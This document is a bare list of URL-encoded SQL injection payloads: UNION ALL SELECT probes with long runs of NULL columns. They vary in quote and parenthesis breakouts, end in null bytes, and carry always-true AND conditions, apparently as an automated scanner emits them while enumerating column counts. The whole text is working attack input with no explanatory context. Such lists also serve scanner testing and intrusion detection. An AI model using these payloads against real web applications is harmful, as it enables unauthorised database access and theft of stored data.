1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281435%3D1435 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286520%3D6520 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286536%3D6536 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284002%3D4002 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285137%3D5137 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284144%3D4144 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284557%3D4557 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%289559%3D9559 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%288003%3D8003 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%282884%3D2884 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%287933%3D7933 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281558%3D1558 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%283886%3D3886 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%288897%3D8897 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284997%3D4997 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284449%3D4449 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%283872%3D3872 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282838%3D2838 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284948%3D4948 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281814%3D1814 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284892%3D4892 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%288112%3D8112 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%287286%3D7286 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281109%3D1109 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%285617%3D5617 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%289825%3D9825 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%286751%3D6751 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281947%3D1947 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282730%3D2730 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284678%3D4678 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 